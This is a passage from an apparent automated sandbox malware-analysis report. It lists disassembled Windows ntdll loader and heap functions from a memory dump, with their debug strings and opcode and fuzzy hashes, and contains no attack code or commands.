                                                                                                                                              • apphelp.dll, xrefs: 34EE6496
                                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 34F49A2A
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F49A11, 34F49A3A
                                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 34F499ED
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-204845295
                                                                                                                                              • Opcode ID: ddf65b09afd9308cffe542b69dcc4eb582bd079fff18c1f0f1f6c532444f5ef4
                                                                                                                                              • Instruction ID: 8c61b1a4c500f76977b1c6a2a8f21de3de751d5a1b36261008225f8383da30ba
                                                                                                                                              • Opcode Fuzzy Hash: ddf65b09afd9308cffe542b69dcc4eb582bd079fff18c1f0f1f6c532444f5ef4
                                                                                                                                              • Instruction Fuzzy Hash: 8B518C71718304DFE324CF30D841EAB7BE8EB84654F484D19E595AB2A0DA30D986CF97
                                                                                                                                              Function 34F6FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                              • API String ID: 3446177414-4227709934
                                                                                                                                              • Opcode ID: df6452c7d1df36a58bd40027fb25df225d96aa4d58a25dd5b5fca6b3c9ff25a2
                                                                                                                                              • Instruction ID: 21bd94c5132d2013d612e98d7204149e632b892f0aed568e797ffd41d8af4942
                                                                                                                                              • Opcode Fuzzy Hash: df6452c7d1df36a58bd40027fb25df225d96aa4d58a25dd5b5fca6b3c9ff25a2
                                                                                                                                              • Instruction Fuzzy Hash: 91418BB9E00208AFDB01DF99C880ADEBBB5FF58318F180459E901A7341C739A952DBA0
                                                                                                                                              Function 34F9FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                              • API String ID: 3446177414-3492000579
                                                                                                                                              • Opcode ID: e5ebda89dc2ae2991d80f3ea96e12decd02f4cf372045d83d19705145eea0e4a
                                                                                                                                              • Instruction ID: 0452a94ddc74b6fe7924511d3bcf8e2058825f2f9f34c2ff92158d5ec25f8507
                                                                                                                                              • Opcode Fuzzy Hash: e5ebda89dc2ae2991d80f3ea96e12decd02f4cf372045d83d19705145eea0e4a
                                                                                                                                              • Instruction Fuzzy Hash: CF71EF35A11645DFEB05CF68D4406EDFBF2FF4A304F088959E445AB252CB319982CFA4
                                                                                                                                              Function 34EE65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34F49AF6
                                                                                                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34F49AB4
                                                                                                                                              • LdrpLoadShimEngine, xrefs: 34F49ABB, 34F49AFC
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F49AC5, 34F49B06
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-3589223738
                                                                                                                                              • Opcode ID: d775e76eda7a423238af6f417ad31ccb76d324663b10de9f0144892bba913393
                                                                                                                                              • Instruction ID: 228853f03b9e9c2713343298d8647b0d6b593b9bdc65928888cdec477d62407c
                                                                                                                                              • Opcode Fuzzy Hash: d775e76eda7a423238af6f417ad31ccb76d324663b10de9f0144892bba913393
                                                                                                                                              • Instruction Fuzzy Hash: D051F775720358DFEB14DBB8CC44EAD77B6EB44304F490969E441BF2A5CB609C82CB94
                                                                                                                                              Function 34F1DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                              • API String ID: 3446177414-3224558752
                                                                                                                                              • Opcode ID: 5f48a8cefebec91b1c6a871f69d2b202e13ae710a39f47098d7d53b5b0ad7f74
                                                                                                                                              • Instruction ID: 10e324b6e870a400378d50b2749df99f2b26fc5e579bc8b4437e85b7c79c228b
                                                                                                                                              • Opcode Fuzzy Hash: 5f48a8cefebec91b1c6a871f69d2b202e13ae710a39f47098d7d53b5b0ad7f74
                                                                                                                                              • Instruction Fuzzy Hash: 2A4146B5610755DFE701CF24C594F5AB7F8EF05364F188DE9D502572A1CB34A882CBA1
                                                                                                                                              Function 34F9F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • HEAP: , xrefs: 34F9F15D
                                                                                                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 34F9F263
                                                                                                                                              • ---------------------------------------, xrefs: 34F9F279
                                                                                                                                              • Entry Heap Size , xrefs: 34F9F26D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                              • API String ID: 3446177414-1102453626
                                                                                                                                              • Opcode ID: d976bb144fccd156b35ed9c17306beaf851b3fdfd0a6f4b77011957c3165e142
                                                                                                                                              • Instruction ID: 8d359c52803a5a00ba2fd80248c8439d3fc59bcc2425c12a60c1768c32fa04a2
                                                                                                                                              • Opcode Fuzzy Hash: d976bb144fccd156b35ed9c17306beaf851b3fdfd0a6f4b77011957c3165e142
                                                                                                                                              • Instruction Fuzzy Hash: 30417939A10615DFE708CF18D880A99BBE5FB4935572D88AED408AB311D731ED83CBE0
                                                                                                                                              Function 34F1DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                              • API String ID: 3446177414-1222099010
                                                                                                                                              • Opcode ID: 141e2e1cd93fa2636bfbad9921f76119852553af3223cd0873603519e242d6f0
                                                                                                                                              • Instruction ID: d7e40806189f4c83520381bf3f2d3c92690ce9bba54009016edcd870e19d8c7b
                                                                                                                                              • Opcode Fuzzy Hash: 141e2e1cd93fa2636bfbad9921f76119852553af3223cd0873603519e242d6f0
                                                                                                                                              • Instruction Fuzzy Hash: AC31F57A115794DFE716CB28C908F5A77F8EF01750F084CD9E44257662CBA9B8C2CB61
                                                                                                                                              Function 34FC6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                              • Instruction ID: cc6e36f5c02d9bccce038fe9fb672095f652bd183f34a85296c71940fa125de1
                                                                                                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                              • Instruction Fuzzy Hash: B802F5B5508342AFE345CF28C490A6BBBE5EFC8714F488D2DF9854B264DB31E906CB52
                                                                                                                                              Function 34F3B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                              • Instruction ID: 91a6da77f737989d476d87765d741a9d1423d5468ac3e5bec7533185d4af855f
                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                              • Instruction Fuzzy Hash: EB818078E072499EEF048E64C8B17EEBBA5EF45350F5C4A5ED850A7293CB349843CB60
                                                                                                                                              Function 34EF9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$@
                                                                                                                                              • API String ID: 3446177414-1194432280
                                                                                                                                              • Opcode ID: cd70b331e7bf8e5763e09d4647c59a5de43b5f565b3d246fe889b5b865f9843f
                                                                                                                                              • Instruction ID: 1c2d8f643d663fc3b7517c4295b204b92afea28cd58506658e22fc6ed98898b4
                                                                                                                                              • Opcode Fuzzy Hash: cd70b331e7bf8e5763e09d4647c59a5de43b5f565b3d246fe889b5b865f9843f
                                                                                                                                              • Instruction Fuzzy Hash: 4C812AB5D00269DFEB21CF54CC44BDAB7B8AF48750F0546EAA949B7250E7309E85CFA0
                                                                                                                                              Function 34F24D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • LdrpFindDllActivationContext, xrefs: 34F63636, 34F63662
                                                                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 34F63640, 34F6366C
                                                                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 34F6365C
                                                                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34F6362F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                              • API String ID: 3446177414-3779518884
                                                                                                                                              • Opcode ID: 18932c586243f441da63e6a6bdc1af156ab6553e082cedd936caccb099e3fd37
                                                                                                                                              • Instruction ID: 940ddd89889e639b37e5704abdb70953f092e2c961b155456449f446a5fbc173
                                                                                                                                              • Opcode Fuzzy Hash: 18932c586243f441da63e6a6bdc1af156ab6553e082cedd936caccb099e3fd37
                                                                                                                                              • Instruction Fuzzy Hash: C731EB7EA00F11BFEB11DB04CC48B5573A4EB01794FCE4D6AE81467250DBE49C838ADA
                                                                                                                                              Function 34F1245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • TG4, xrefs: 34F12462
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F5A9A2
                                                                                                                                              • LdrpDynamicShimModule, xrefs: 34F5A998
                                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 34F5A992
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG4$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-3886369598
                                                                                                                                              • Opcode ID: 0dee9ef1e897a82d850f44029f5da770a2c74eb86561b20ed18e907886abe54e
                                                                                                                                              • Instruction ID: a4522dd4094255a55c350fac320c8e875eb2b0560700f4bd524c8a6c1a6cdcc0
                                                                                                                                              • Opcode Fuzzy Hash: 0dee9ef1e897a82d850f44029f5da770a2c74eb86561b20ed18e907886abe54e
                                                                                                                                              • Instruction Fuzzy Hash: 1F314876A10305EFE7109F99D884EAA77B4FB84754F5E09A9E800B7261C77099D3CBC1
                                                                                                                                              Function 34FA20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                              • Opcode ID: e7ceff78a24a96160dca3322b05d84c9b2ea610e48aaa7b949563040c7a8954f
                                                                                                                                              • Instruction ID: ef67ff5d474812ac81374e221fdead3d64bf84298bae1e45d43fd8523a92d280
                                                                                                                                              • Opcode Fuzzy Hash: e7ceff78a24a96160dca3322b05d84c9b2ea610e48aaa7b949563040c7a8954f
                                                                                                                                              • Instruction Fuzzy Hash: 122135BAA01119AFD710DFB9DC44AEE7BF8EF54684F49051AE905E3300EB34D9128FA1
                                                                                                                                              Function 34EEF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 3446177414-3610490719
                                                                                                                                              • Opcode ID: b7b51698e7649b6f9cf10e3b1dc7ea0e23ce50cf98003e3170d9ae9e1fed95e0
                                                                                                                                              • Instruction ID: 9dddd3a6eec867942c6253636e744642caa6e6aa3b290fc5d2625a3760c52e9a
                                                                                                                                              • Opcode Fuzzy Hash: b7b51698e7649b6f9cf10e3b1dc7ea0e23ce50cf98003e3170d9ae9e1fed95e0
                                                                                                                                              • Instruction Fuzzy Hash: 6091F575715741EFF715CF24C880B7ABBA9BF84698F084859E9849B381DF34E882CB91
                                                                                                                                              Function 34F10BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F5A121
                                                                                                                                              • LdrpCheckModule, xrefs: 34F5A117
                                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 34F5A10F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-161242083
                                                                                                                                              • Opcode ID: 8dea68fa2e2e52d801763b52e2cea594f3cb6c211c18209117cd6d14188429ae
                                                                                                                                              • Instruction ID: 7a3207a365f7e0ae08ba0b2fc63ce87c0b37087da188c3583d4b8f95e39962e1
                                                                                                                                              • Opcode Fuzzy Hash: 8dea68fa2e2e52d801763b52e2cea594f3cb6c211c18209117cd6d14188429ae
                                                                                                                                              • Instruction Fuzzy Hash: 6271AD75A10209DFEB04DF69C980AAEB7F5EB44204F5D486DE801E7660E734AA83CF94
                                                                                                                                              Function 34FC8927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $File
                                                                                                                                              • API String ID: 3446177414-2412145507
                                                                                                                                              • Opcode ID: 3a8ff70a646868e738f2c78da9306a0a05dee07b73dd9676b5eef3de60ffc96e
                                                                                                                                              • Instruction ID: 1831db2652e0963ac019d5efa130290cf3951e0eaa6c2c8411f146cfd1301e64
                                                                                                                                              • Opcode Fuzzy Hash: 3a8ff70a646868e738f2c78da9306a0a05dee07b73dd9676b5eef3de60ffc96e
                                                                                                                                              • Instruction Fuzzy Hash: F161AE71A1021DAFEB268F24CC41BE9B7B8AF48711F4849EDE509E6191DB709F85CF50
                                                                                                                                              Function 34F19803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                              • API String ID: 3446177414-2283098728
                                                                                                                                              • Opcode ID: 68b008bb11086a15e9963b8a0bf661086e4f39d091fa035b481eedad6df4b4f9
                                                                                                                                              • Instruction ID: cd1ccbd27472d1ba4b070137cfaf10c803b6596e51dde0f7425d9b874d8827a8
                                                                                                                                              • Opcode Fuzzy Hash: 68b008bb11086a15e9963b8a0bf661086e4f39d091fa035b481eedad6df4b4f9
                                                                                                                                              • Instruction Fuzzy Hash: 19519F75704702DFE715DF24C884E2AB7A5BB84224F8C4E6DE4969B291DB30A847CFD1
                                                                                                                                              Function 34F2C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
